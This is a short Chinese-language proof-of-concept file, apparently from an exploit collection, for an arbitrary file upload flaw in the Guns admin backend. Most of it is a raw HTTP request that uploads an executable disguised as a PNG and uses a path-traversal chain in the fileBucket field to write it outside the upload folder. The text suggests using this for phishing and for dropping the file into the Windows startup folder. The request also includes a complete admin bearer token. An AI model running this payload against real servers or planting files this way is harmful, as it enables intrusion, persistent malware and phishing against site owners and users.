POC/wpoc/Guns/Guns后台任意文件上传漏洞.md

# Guns后台任意文件上传漏洞

Guns后台任意文件上传漏洞

## poc

```javascript
POST /api/sysFileInfo/upload HTTP/1.1
Host: 192.168.91.130:9000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.91.1:9000/system/structure/user
Authorization: eyJhbGciOiJIUzUxMiJ9.eyJ1c2VySWQiOjEzMzk1NTA0Njc5Mzk2MzkyOTksImFjY291bnQiOiJhZG1pbiIsInV1aWQiOiI1NmQzZjczNy1hNjU1LTRjYzgtODRkNi0xNDdjYTE1M2Y5OGIiLCJyZW1lbWJlck1lIjpmYWxzZSwiZXhwaXJhdGlvbkRhdGUiOjE3MzUxMDM0MDM0ODgsImNhVG9rZW4iOm51bGwsIm90aGVycyI6bnVsbCwic3ViIjoiMTMzOTU1MDQ2NzkzOTYzOTI5OSIsImlhdCI6MTczNDQ5ODYwMywiZXhwIjoxNzM1MTAzNDAzfQ.Ur3bUwltSXWUtIT1OOR4MV4frJeRy_MDEkmYg99F5L2DOx6C4ha_y476dTWMy7gAJZsq5x_2C_VEkWxWv7uHXw
Content-Type: multipart/form-data; boundary=---------------------------4047569836919132683218702
Content-Length: 510
Origin: http://192.168.91.130:9000
Connection: close

-----------------------------4047569836919132683218702
Content-Disposition: form-data; name="file"; filename=".exe"
Content-Type: image/png

1111
-----------------------------4047569836919132683218702
Content-Disposition: form-data; name="secretFlag"

N
-----------------------------4047569836919132683218702
Content-Disposition: form-data; name="fileBucket"

../../../../../../../../../../../../../../../../../../看到请点击exe备份
-----------------------------4047569836919132683218702--
```

![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412300945840.png)

![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412300946118.png)

可以用在钓鱼，如果项目在c盘，可以放到启动项中，
这里可以看到是在哪个盘

![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412300946901.png)

## 漏洞来源

- https://xz.aliyun.com/t/16808?time__1311=Gui%3DGIfDODkD%2FD0lD2DUxQw860LQcrpD#toc-0